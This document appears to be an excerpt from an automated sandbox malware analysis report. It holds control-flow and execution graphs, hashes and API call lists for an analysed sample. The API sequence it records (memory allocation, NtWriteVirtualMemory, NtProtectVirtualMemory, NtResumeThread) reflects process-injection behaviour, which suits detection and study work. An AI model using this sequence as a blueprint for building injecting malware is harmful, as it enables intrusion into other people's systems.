                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2133 229f3ee-229f4b1 2135 229f4b3-229f4e1 call 229fcc1 call 229f542 2133->2135 2136 229f4e4-229f53d LoadLibraryA call 229f542 2133->2136 2135->2136
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction ID: 7ce17dad6ccd79c83be7301ccbc40aedb5d830660609e3c5e0a217bbc79fa59c
                                                                                                                          • Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction Fuzzy Hash: 7611667160132A9BCF30AFA95AA43CB337AAFC8790FA5801BDC49DB600D7718D41CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2144 2293800-2293858 2147 229385e-2293876 call 2295ee3 2144->2147 2148 2293a62-229c1ca TerminateProcess 2144->2148
                                                                                                                          APIs
                                                                                                                          • TerminateProcess.KERNELBASE ref: 0229C1BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 560597551-0
                                                                                                                          • Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction ID: da2392900abf1338ace485c39df75b4200c675fc7f6a963f44f2862257977f40
                                                                                                                          • Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction Fuzzy Hash: 360142355A830A8BCF14AA3085823EDB7A0EE55360F964158CCD252019D32540CACF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:368
                                                                                                                          Total number of Limit Nodes:6

                                                                                                                          Graph

                                                                                                                          execution_graph 8611 23238e2 8612 232385e 8611->8612 8613 2323853 8611->8613 8613->8612 8614 232c18f TerminateProcess 8613->8614 8615 232257b 8616 2322531 8615->8616 8616->8615 8622 232fcc1 GetPEB 8616->8622 8618 2330fcb 8619 2330ff7 33 API calls 8618->8619 8620 2330ff2 8619->8620 8624 2330ff7 8620->8624 8623 232fcdb 8622->8623 8623->8618 8625 2331002 8624->8625 8628 2331161 8625->8628 8627 23312f6 8627->8620 8627->8627 8661 232138e 8628->8661 8629 23312b3 8629->8627 8630 232f4e4 LoadLibraryA 8632 232f533 8630->8632 8631 232fcc1 GetPEB 8633 232f4c2 8631->8633 8632->8627 8633->8630 8635 23314fe GetPEB 8635->8661 8638 23323e2 NtProtectVirtualMemory 8639 23323db 8638->8639 8639->8627 8641 2332284 8641->8638 8642 2331f4c 8646 23323e2 NtProtectVirtualMemory 8642->8646 8650 2321320 8642->8650 8643 23318ac 8643->8643 8645 23323e2 NtProtectVirtualMemory 8643->8645 8644 233322b 29 API calls 8647 2333190 NtResumeThread 8644->8647 8645->8650 8648 233216a 8646->8648 8647->8661 8648->8627 8650->8627 8651 232bbfe 8652 2332acd 29 API calls 8651->8652 8654 232bc5f 8652->8654 8653 232f3ee LoadLibraryA GetPEB 8653->8661 8655 2332acd 29 API calls 8654->8655 8657 232bc72 8655->8657 8656 2332acd 29 API calls 8656->8661 8658 2332acd 29 API calls 8657->8658 8660 232bcba 8658->8660 8660->8627 8660->8629 8660->8630 8660->8631 8661->8635 8661->8641 8661->8642 8661->8643 8661->8644 8661->8650 8661->8651 8661->8653 8661->8656 8661->8660 8662 232b695 8661->8662 8672 2331490 8661->8672 8716 232f3ca GetPEB 8661->8716 8717 232bd4b 8661->8717 8723 23323e2 8661->8723 8726 23306a2 8661->8726 8770 233322b 8661->8770 8662->8651 8663 232b943 NtWriteVirtualMemory 8662->8663 8664 232b9e1 8663->8664 8664->8651 8721 2332acd 8664->8721 8814 232f3ee 8672->8814 8674 232f3ee LoadLibraryA GetPEB 8705 232138e 8674->8705 8675 23314fe GetPEB 8675->8705 8676 23323e2 NtProtectVirtualMemory 8676->8705 8677 23323e2 NtProtectVirtualMemory 8678 23323db 8677->8678 8678->8661 8679 2332284 8679->8677 8680 2331f4c 8683 23323e2 NtProtectVirtualMemory 8680->8683 8695 2321320 8680->8695 8681 23318ac 8681->8681 8682 23323e2 NtProtectVirtualMemory 8681->8682 8682->8695 8685 233216a 8683->8685 8684 23306a2 25 API calls 8684->8705 8685->8661 8686 233322b 25 API calls 8686->8705 8687 2331490 25 API calls 8687->8705 8688 233322b 25 API calls 8689 2333190 NtResumeThread 8688->8689 8689->8705 8690 232f4e4 LoadLibraryA 8692 232f533 8690->8692 8691 232fcc1 GetPEB 8693 232f4c2 8691->8693 8692->8661 8693->8690 8695->8661 8696 232bbfe 8697 2332acd 25 API calls 8696->8697 8698 232bc5f 8697->8698 8699 2332acd 25 API calls 8698->8699 8701 232bc72 8699->8701 8700 2332acd 25 API calls 8700->8705 8702 2332acd 25 API calls 8701->8702 8704 232bcba 8702->8704 8703 232bd4b 25 API calls 8703->8705 8704->8661 8704->8690 8704->8691 8705->8672 8705->8674 8705->8675 8705->8676 8705->8679 8705->8680 8705->8681 8705->8684 8705->8686 8705->8687 8705->8688 8705->8695 8705->8696 8705->8700 8705->8703 8705->8704 8706 232b695 8705->8706 8813 232f3ca GetPEB 8705->8813 8706->8696 8707 232b943 NtWriteVirtualMemory 8706->8707 8708 232b9e1 8707->8708 8708->8696 8709 2332acd 25 API calls 8708->8709 8710 232ba4c 8709->8710 8710->8696 8711 2332acd 25 API calls 8710->8711 8712 232bb07 8711->8712 8712->8696 8713 232bb84 8712->8713 8713->8695 8714 2332acd 25 API calls 8713->8714 8715 232bbfa 8714->8715 8715->8661 8716->8661 8718 232e44c 8717->8718 8820 232bd54 8718->8820 8720 232e451 8917 2332ad2 8721->8917 8724 2332458 NtProtectVirtualMemory 8723->8724 8724->8661 8727 232fcc1 GetPEB 8726->8727 8753 232138e 8727->8753 8728 2331490 25 API calls 8728->8753 8729 232f4e4 LoadLibraryA 8731 232f533 8729->8731 8730 232fcc1 GetPEB 8732 232f4c2 8730->8732 8731->8661 8732->8729 8734 232bbfe 8735 2332acd 25 API calls 8734->8735 8736 232bc5f 8735->8736 8737 2332acd 25 API calls 8736->8737 8738 232bc72 8737->8738 8739 2332acd 25 API calls 8738->8739 8741 232bcba 8739->8741 8740 232bd4b 25 API calls 8740->8753 8741->8661 8741->8729 8741->8730 8742 2332acd 25 API calls 8742->8753 8743 232f3ee LoadLibraryA GetPEB 8743->8753 8744 232b695 8744->8734 8747 232b943 NtWriteVirtualMemory 8744->8747 8745 23306a2 25 API calls 8745->8753 8746 23314fe GetPEB 8746->8753 8749 232b9e1 8747->8749 8748 23323e2 NtProtectVirtualMemory 8748->8753 8749->8734 8750 2332acd 25 API calls 8749->8750 8752 232ba4c 8750->8752 8751 2321320 8751->8661 8752->8734 8754 2332acd 25 API calls 8752->8754 8753->8728 8753->8734 8753->8740 8753->8741 8753->8742 8753->8743 8753->8744 8753->8745 8753->8746 8753->8748 8753->8751 8756 233322b 25 API calls 8753->8756 8762 2332284 8753->8762 8763 2331f4c 8753->8763 8764 23318ac 8753->8764 8765 233322b 25 API calls 8753->8765 8961 232f3ca GetPEB 8753->8961 8755 232bb07 8754->8755 8755->8734 8757 232bb84 8755->8757 8756->8753 8757->8751 8758 2332acd 25 API calls 8757->8758 8759 232bbfa 8758->8759 8759->8661 8760 23323e2 NtProtectVirtualMemory 8761 23323db 8760->8761 8761->8661 8762->8760 8763->8751 8767 23323e2 NtProtectVirtualMemory 8763->8767 8764->8764 8766 23323e2 NtProtectVirtualMemory 8764->8766 8768 2333190 NtResumeThread 8765->8768 8766->8751 8769 233216a 8767->8769 8768->8753 8769->8661 8796 232138e 8770->8796 8771 2331490 25 API calls 8771->8796 8772 232f4e4 LoadLibraryA 8774 232f533 8772->8774 8773 232fcc1 GetPEB 8775 232f4c2 8773->8775 8774->8661 8775->8772 8777 2332acd 25 API calls 8777->8796 8778 232bbfe 8779 2332acd 25 API calls 8778->8779 8780 232bc5f 8779->8780 8781 2332acd 25 API calls 8780->8781 8782 232bc72 8781->8782 8783 2332acd 25 API calls 8782->8783 8785 232bcba 8783->8785 8784 232bd4b 25 API calls 8784->8796 8785->8661 8785->8772 8785->8773 8786 232f3ee LoadLibraryA GetPEB 8786->8796 8787 232b695 8787->8778 8790 232b943 NtWriteVirtualMemory 8787->8790 8788 23306a2 25 API calls 8788->8796 8789 23314fe GetPEB 8789->8796 8792 232b9e1 8790->8792 8791 23323e2 NtProtectVirtualMemory 8791->8796 8792->8778 8793 2332acd 25 API calls 8792->8793 8795 232ba4c 8793->8795 8794 2321320 8794->8661 8795->8778 8797 2332acd 25 API calls 8795->8797 8796->8770 8796->8771 8796->8777 8796->8778 8796->8784 8796->8785 8796->8786 8796->8787 8796->8788 8796->8789 8796->8791 8796->8794 8799 233322b 25 API calls 8796->8799 8805 2332284 8796->8805 8806 2331f4c 8796->8806 8807 23318ac 8796->8807 8808 233322b 25 API calls 8796->8808 8962 232f3ca GetPEB 8796->8962 8798 232bb07 8797->8798 8798->8778 8800 232bb84 8798->8800 8799->8796 8800->8794 8801 2332acd 25 API calls 8800->8801 8802 232bbfa 8801->8802 8802->8661 8803 23323e2 NtProtectVirtualMemory 8804 23323db 8803->8804 8804->8661 8805->8803 8806->8794 8810 23323e2 NtProtectVirtualMemory 8806->8810 8807->8807 8809 23323e2 NtProtectVirtualMemory 8807->8809 8811 2333190 NtResumeThread 8808->8811 8809->8794 8812 233216a 8810->8812 8811->8796 8812->8661 8813->8705 8815 232f46b 8814->8815 8816 232f4e4 LoadLibraryA 8815->8816 8817 232fcc1 GetPEB 8815->8817 8818 232f533 8816->8818 8819 232f4c2 8817->8819 8818->8705 8819->8816 8821 232bdb8 8820->8821 8836 232c88b 8821->8836 8823 232bdcf 8828 232bf10 8823->8828 8895 232be04 8823->8895 8827 232e672 8827->8827 8828->8827 8834 232e463 8828->8834 8905 232bf1c 8828->8905 8829 232f3ee 8830 232f4e4 LoadLibraryA 8829->8830 8831 232fcc1 GetPEB 8829->8831 8832 232f533 8830->8832 8833 232f4c2 8831->8833 8832->8720 8833->8830 8834->8829 8884 232c7b8 8834->8884 8887 232c02c 8834->8887 8837 232c8a6 8836->8837 8856 232bcba 8836->8856 8838 232f3ee 2 API calls 8837->8838 8837->8856 8843 232c9d5 8838->8843 8839 232f4e4 LoadLibraryA 8841 232f533 8839->8841 8840 232fcc1 GetPEB 8842 232f4c2 8840->8842 8841->8823 8842->8839 8845 232cb1e NtAllocateVirtualMemory 8843->8845 8867 232138e 8843->8867 8844 2331490 24 API calls 8844->8867 8845->8856 8848 232bbfe 8849 2332acd 24 API calls 8848->8849 8850 232bc5f 8849->8850 8851 2332acd 24 API calls 8850->8851 8853 232bc72 8851->8853 8852 2332acd 24 API calls 8852->8867 8854 2332acd 24 API calls 8853->8854 8854->8856 8855 232bd4b 24 API calls 8855->8867 8856->8823 8856->8839 8856->8840 8857 232f3ee LoadLibraryA GetPEB 8857->8867 8858 232b695 8858->8848 8861 232b943 NtWriteVirtualMemory 8858->8861 8859 23306a2 24 API calls 8859->8867 8860 23314fe GetPEB 8860->8867 8863 232b9e1 8861->8863 8862 23323e2 NtProtectVirtualMemory 8862->8867 8863->8848 8864 2332acd 24 API calls 8863->8864 8866 232ba4c 8864->8866 8865 2321320 8865->8823 8866->8848 8868 2332acd 24 API calls 8866->8868 8867->8844 8867->8848 8867->8852 8867->8855 8867->8856 8867->8857 8867->8858 8867->8859 8867->8860 8867->8862 8867->8865 8870 233322b 24 API calls 8867->8870 8876 2332284 8867->8876 8877 2331f4c 8867->8877 8878 23318ac 8867->8878 8879 233322b 24 API calls 8867->8879 8916 232f3ca GetPEB 8867->8916 8869 232bb07 8868->8869 8869->8848 8871 232bb84 8869->8871 8870->8867 8871->8865 8872 2332acd 24 API calls 8871->8872 8873 232bbfa 8872->8873 8873->8823 8874 23323e2 NtProtectVirtualMemory 8875 23323db 8874->8875 8875->8823 8876->8874 8877->8865 8881 23323e2 NtProtectVirtualMemory 8877->8881 8878->8878 8880 23323e2 NtProtectVirtualMemory 8878->8880 8882 2333190 NtResumeThread 8879->8882 8880->8865 8883 233216a 8881->8883 8882->8867 8883->8823 8885 232c88b 29 API calls 8884->8885 8886 232c7f2 8885->8886 8886->8834 8888 232c098 8887->8888 8889 232c88b 28 API calls 8888->8889 8890 232c0d9 8889->8890 8890->8834 8891 232f4e4 LoadLibraryA 8890->8891 8892 232fcc1 GetPEB 8890->8892 8893 232f533 8891->8893 8894 232f4c2 8892->8894 8893->8834 8894->8891 8896 232c88b 28 API calls 8895->8896 8903 232be29 8896->8903 8897 232f3ee 8898 232f4e4 LoadLibraryA 8897->8898 8899 232fcc1 GetPEB 8897->8899 8900 232f533 8898->8900 8901 232f4c2 8899->8901 8900->8828 8901->8898 8902 232c02c 28 API calls 8902->8903 8903->8897 8903->8902 8904 232c7b8 28 API calls 8903->8904 8904->8903 8906 232bf75 8905->8906 8907 232f3ee 8906->8907 8908 232c88b 28 API calls 8906->8908 8909 232f4e4 LoadLibraryA 8907->8909 8910 232fcc1 GetPEB 8907->8910 8914 232bfe4 8908->8914 8911 232f533 8909->8911 8912 232f4c2 8910->8912 8911->8828 8912->8909 8913 232c02c 28 API calls 8913->8914 8914->8907 8914->8913 8915 232c7b8 28 API calls 8914->8915 8915->8914 8916->8867 8948 232138e 8917->8948 8918 23306a2 25 API calls 8918->8948 8919 232f3ee LoadLibraryA GetPEB 8919->8948 8920 23314fe GetPEB 8920->8948 8921 233322b 25 API calls 8921->8948 8922 23323e2 NtProtectVirtualMemory 8922->8948 8923 2331490 25 API calls 8923->8948 8924 233322b 25 API calls 8925 2333190 NtResumeThread 8924->8925 8925->8948 8926 23323e2 NtProtectVirtualMemory 8927 23323db 8926->8927 8928 232f4e4 LoadLibraryA 8930 232f533 8928->8930 8929 232fcc1 GetPEB 8931 232f4c2 8929->8931 8931->8928 8932 2332284 8932->8926 8934 2331f4c 8936 2321320 8934->8936 8938 23323e2 NtProtectVirtualMemory 8934->8938 8935 23318ac 8935->8935 8937 23323e2 NtProtectVirtualMemory 8935->8937 8937->8936 8939 233216a 8938->8939 8940 232bbfe 8941 2332acd 25 API calls 8940->8941 8942 232bc5f 8941->8942 8943 2332acd 25 API calls 8942->8943 8944 232bc72 8943->8944 8945 2332acd 25 API calls 8944->8945 8947 232bcba 8945->8947 8946 232bd4b 25 API calls 8946->8948 8947->8928 8947->8929 8948->8917 8948->8918 8948->8919 8948->8920 8948->8921 8948->8922 8948->8923 8948->8924 8948->8932 8948->8934 8948->8935 8948->8936 8948->8940 8948->8946 8948->8947 8949 2332acd 25 API calls 8948->8949 8950 232b695 8948->8950 8960 232f3ca GetPEB 8948->8960 8949->8948 8950->8940 8951 232b943 NtWriteVirtualMemory 8950->8951 8952 232b9e1 8951->8952 8952->8940 8953 2332acd 25 API calls 8952->8953 8954 232ba4c 8953->8954 8954->8940 8955 2332acd 25 API calls 8954->8955 8956 232bb07 8955->8956 8956->8940 8957 232bb84 8956->8957 8957->8936 8958 2332acd 25 API calls 8957->8958 8959 232bbfa 8958->8959 8960->8948 8961->8753 8962->8796 8963 232c88b 8964 232c8a6 8963->8964 8983 232bcba 8963->8983 8965 232f3ee 2 API calls 8964->8965 8964->8983 8970 232c9d5 8965->8970 8966 232f4e4 LoadLibraryA 8968 232f533 8966->8968 8967 232fcc1 GetPEB 8969 232f4c2 8967->8969 8969->8966 8972 232cb1e NtAllocateVirtualMemory 8970->8972 8994 232138e 8970->8994 8971 2331490 24 API calls 8971->8994 8972->8983 8975 232bbfe 8976 2332acd 24 API calls 8975->8976 8977 232bc5f 8976->8977 8978 2332acd 24 API calls 8977->8978 8980 232bc72 8978->8980 8979 2332acd 24 API calls 8979->8994 8981 2332acd 24 API calls 8980->8981 8981->8983 8982 232bd4b 24 API calls 8982->8994 8983->8966 8983->8967 8984 232f3ee LoadLibraryA GetPEB 8984->8994 8985 232b695 8985->8975 8988 232b943 NtWriteVirtualMemory 8985->8988 8986 23306a2 24 API calls 8986->8994 8987 23314fe GetPEB 8987->8994 8990 232b9e1 8988->8990 8989 23323e2 NtProtectVirtualMemory 8989->8994 8990->8975 8991 2332acd 24 API calls 8990->8991 8993 232ba4c 8991->8993 8992 2321320 8993->8975 8995 2332acd 24 API calls 8993->8995 8994->8971 8994->8975 8994->8979 8994->8982 8994->8983 8994->8984 8994->8985 8994->8986 8994->8987 8994->8989 8994->8992 8997 233322b 24 API calls 8994->8997 9003 2332284 8994->9003 9004 2331f4c 8994->9004 9005 23318ac 8994->9005 9006 233322b 24 API calls 8994->9006 9011 232f3ca GetPEB 8994->9011 8996 232bb07 8995->8996 8996->8975 8998 232bb84 8996->8998 8997->8994 8998->8992 8999 2332acd 24 API calls 8998->8999 9000 232bbfa 8999->9000 9001 23323e2 NtProtectVirtualMemory 9002 23323db 9001->9002 9003->9001 9004->8992 9008 23323e2 NtProtectVirtualMemory 9004->9008 9005->9005 9007 23323e2 NtProtectVirtualMemory 9005->9007 9009 2333190 NtResumeThread 9006->9009 9007->8992 9010 233216a 9008->9010 9009->8994 9011->8994

                                                                                                                          Executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
                                                                                                                          • API String ID: 1029625771-3546614695
                                                                                                                          • Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction ID: b1e631e997f1e5b983ca126ad627f741e445e945af88eea5c0ef10efdbaaa96b
                                                                                                                          • Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction Fuzzy Hash: 3AB2457160435A9FDF349E38CDA53DA77B2EF55390F95812ECC8A8B644D3348A86CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 316 23306a2-23306df call 232fcc1 319 232a574-232a80f call 2331490 call 232a760 316->319 320 23306e5-233073c 316->320 343 232a815-232a841 319->343 344 232f3ee-232f4b1 319->344 323 2330742-233074e 320->323 324 2333b58-2333bea call 232f0f7 320->324 326 233374d-2333755 323->326 329 2333756-233378f 326->329 329->329 332 2333791-23337e0 329->332 345 2321320-232136d call 23210c0 343->345 346 232a847-232a8fa 343->346 351 232f4b3-232f4e1 call 232fcc1 call 232f542 344->351 352 232f4e4-232f4e9 LoadLibraryA 344->352 346->326 354 232a900-232aac7 call 232f3ca call 2332acd 346->354 351->352 355 232f533-232f53d call 232f542 352->355 369 232bbfe-232bd48 call 2332acd * 3 354->369 370 232aacd-232afd9 call 232f3ee call 2332acd call 232bd4b call 232f313 call 2332acd 354->370 369->344 370->369 397 232afdf-232b089 370->397 397->344 399 232b08f-232b1e5 call 2332acd 397->399 399->345 404 232b1eb-232b20b 399->404 404->369 405 232b211-232b3f2 call 232b2fb 404->405 411 232b3f8-232b554 call 2332acd 405->411 412 232138e-2321464 call 23337e8 405->412 411->369 423 232b55a-232b597 411->423 421 2321466-2332adc 412->421 422 23214dd-2321502 412->422 429 2332add-2332b37 421->429 425 2321572-2321578 422->425 426 2321517-2321518 422->426 423->369 427 232b59d-232b604 423->427 430 2321579-2321594 425->430 426->425 431 232b641-232b64a 427->431 432 232b606-232b63b 427->432 429->412 436 2332b3d-2332d65 429->436 430->426 434 2321596-23215a6 430->434 431->319 435 232b650-232b66e 431->435 432->369 432->431 437 23215b6-23215b9 434->437 438 23215a9-23215b4 434->438 435->369 440 232b674-232b68f 435->440 436->429 461 2332d6b-2332de9 call 23306a2 436->461 437->430 439 23215bb-23315f9 call 232f3ee * 2 call 23337e8 GetPEB call 23323e2 437->439 438->437 479 2331df1-2331e3a 439->479 480 23315ff-23316a1 439->480 440->319 442 232b695-232b8b7 call 232f944 440->442 442->369 460 232b8bd-232b99b call 233374d NtWriteVirtualMemory 442->460 473 232b9e1-232b9ea 460->473 471 2332dec-2332dff 461->471 471->471 475 2332e01-2332e89 471->475 473->369 474 232b9f0-232baba call 2332acd 473->474 474->369 489 232bac0-232bb82 call 2332acd 474->489 483 2332e8c-2332f06 475->483 480->412 487 23316a7-2331838 480->487 490 2332f08-2332fe7 call 233322b 483->490 497 233183c-233184d 487->497 489->369 502 232bb84-232bbde 489->502 511 2332fed-2333091 490->511 512 23331cc-2333231 490->512 500 2331853-2331863 497->500 501 2331e40-2331e54 497->501 500->497 504 2331865-2331892 500->504 503 2331e58-2331e6d 501->503 502->326 510 232bbe4-232bbfd call 2332acd 502->510 507 2331e73-2331eac 503->507 508 2332172-2332187 503->508 504->497 509 2331894-23318aa 504->509 507->503 513 2331eae-2331ec5 507->513 508->412 515 233218d-233218e 508->515 509->497 514 23318ac-2331920 509->514 511->512 523 2333097-23330ad 511->523 512->319 531 2333237-2333269 512->531 513->503 519 2331ec7-2331f29 513->519 527 2331922-233199c 514->527 521 2332192-23321a1 515->521 519->503 533 2331f2f-2331f46 519->533 528 23321a7-2332219 521->528 529 23323b6-23323dd call 23323e2 521->529 523->512 524 23330b3-23330ca 523->524 524->512 530 23330d0-2333102 524->530 540 23319a2-23319e7 527->540 541 2331a39-2331a4c 527->541 528->412 542 233221f-233222a 528->542 530->512 543 2333108-2333161 530->543 531->512 537 233326f-23332f4 531->537 533->412 539 2331f4c-2331fb8 533->539 537->512 550 23332fa-233332c 537->550 551 2331fbd-2331fd1 539->551 546 2331a69-2331a79 540->546 541->546 547 2331a4e-2331a68 541->547 542->521 548 2332230-2332244 542->548 543->512 556 2333163-233317d 543->556 553 2331a7f-2331a96 546->553 554 2331c2d-2331c44 546->554 547->546 548->521 552 233224a-233227e 548->552 550->512 557 2333332-2333335 550->557 560 23320a7-23320e0 551->560 561 2331fd7-2331ff1 551->561 552->521 562 2332284-23322f0 552->562 553->554 555 2331a9c-2331b0e 553->555 558 2331d64-2331da8 554->558 559 2331c4a-2331cd0 554->559 573 2331b0f-2331b3f 555->573 556->512 566 233317f-23331ab call 233322b NtResumeThread 556->566 558->527 570 2331dae-2331dec call 23323e2 558->570 559->558 576 2331cd6-2331d61 559->576 560->551 565 23320e6-233216c call 23323e2 560->565 568 2331ff3-233200a 561->568 569 233201c-2332084 561->569 572 23322f5-233230e 562->572 590 23331b0-23331b8 566->590 568->345 577 2332010-233201a 568->577 569->560 570->479 579 2332310-233237a 572->579 580 233237b-23323ae 572->580 573->573 581 2331b41-2331bdb 573->581 576->558 577->569 585 2332088-23320a6 577->585 579->580 580->572 588 23323b4 580->588 581->573 593 2331be1-2331c20 581->593 585->560 588->529 590->590 592 23331ba-23331c6 590->592 592->512 593->573 594 2331c26-2331c2a 593->594 594->554
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ";Jm$H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 0-2571250244
                                                                                                                          • Opcode ID: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
                                                                                                                          • Instruction ID: 4d603072ef41ef8bbf52810a3f9c0a4b842a433efe3cb83e906ced36bd5bd4c0
                                                                                                                          • Opcode Fuzzy Hash: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
                                                                                                                          • Instruction Fuzzy Hash: C9A2547160434A9FDB349E38CDA57DA7BA2FF55350F55822EDC8A8B650D334898ACB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 1029625771-1197094480
                                                                                                                          • Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction ID: 0effb6122d5953c3f6c13117bf4de3a9de4165bfad170a63b0196a1db49a8abf
                                                                                                                          • Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction Fuzzy Hash: 3AC2557160434A9FDF349E38CDA17EA77A6EF55390F95812ECC8A8B654D3308986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 916 233322b-2333231 917 2333237-2333269 916->917 918 232a574-232a80f call 2331490 call 232a760 916->918 919 233326f-23332f4 917->919 920 23331cc-2333222 917->920 933 232a815-232a841 918->933 934 232f3ee-232f4b1 918->934 919->920 925 23332fa-233332c 919->925 920->916 925->920 927 2333332-2333335 925->927 935 2321320-232136d call 23210c0 933->935 936 232a847-232a8fa 933->936 940 232f4b3-232f4e1 call 232fcc1 call 232f542 934->940 941 232f4e4-232f4e9 LoadLibraryA 934->941 943 232a900-232aac7 call 232f3ca call 2332acd 936->943 944 233374d-2333755 936->944 940->941 945 232f533-232f53d call 232f542 941->945 962 232bbfe-232bd48 call 2332acd * 3 943->962 963 232aacd-232afd9 call 232f3ee call 2332acd call 232bd4b call 232f313 call 2332acd 943->963 950 2333756-233378f 944->950 950->950 954 2333791-23337e0 950->954 962->934 963->962 990 232afdf-232b089 963->990 990->934 992 232b08f-232b1e5 call 2332acd 990->992 992->935 997 232b1eb-232b20b 992->997 997->962 998 232b211-232b3f2 call 232b2fb 997->998 1004 232b3f8-232b554 call 2332acd 998->1004 1005 232138e-2321464 call 23337e8 998->1005 1004->962 1016 232b55a-232b597 1004->1016 1014 2321466-2332adc 1005->1014 1015 23214dd-2321502 1005->1015 1022 2332add-2332b37 1014->1022 1018 2321572-2321578 1015->1018 1019 2321517-2321518 1015->1019 1016->962 1020 232b59d-232b604 1016->1020 1023 2321579-2321594 1018->1023 1019->1018 1024 232b641-232b64a 1020->1024 1025 232b606-232b63b 1020->1025 1022->1005 1029 2332b3d-2332d65 1022->1029 1023->1019 1027 2321596-23215a6 1023->1027 1024->918 1028 232b650-232b66e 1024->1028 1025->962 1025->1024 1030 23215b6-23215b9 1027->1030 1031 23215a9-23215b4 1027->1031 1028->962 1033 232b674-232b68f 1028->1033 1029->1022 1054 2332d6b-2332de9 call 23306a2 1029->1054 1030->1023 1032 23215bb-23315f9 call 232f3ee * 2 call 23337e8 GetPEB call 23323e2 1030->1032 1031->1030 1072 2331df1-2331e3a 1032->1072 1073 23315ff-23316a1 1032->1073 1033->918 1035 232b695-232b815 1033->1035 1044 232b85f-232b884 call 232f944 1035->1044 1050 232b889-232b8b7 1044->1050 1050->962 1053 232b8bd-232b93e call 233374d 1050->1053 1063 232b943-232b99b NtWriteVirtualMemory 1053->1063 1064 2332dec-2332dff 1054->1064 1066 232b9e1-232b9ea 1063->1066 1064->1064 1068 2332e01-2332e89 1064->1068 1066->962 1067 232b9f0-232baba call 2332acd 1066->1067 1067->962 1082 232bac0-232bb82 call 2332acd 1067->1082 1076 2332e8c-2332f06 1068->1076 1073->1005 1080 23316a7-2331838 1073->1080 1083 2332f08-2332fe7 call 233322b 1076->1083 1090 233183c-233184d 1080->1090 1082->962 1095 232bb84-232bbde 1082->1095 1083->920 1104 2332fed-2333091 1083->1104 1093 2331853-2331863 1090->1093 1094 2331e40-2331e54 1090->1094 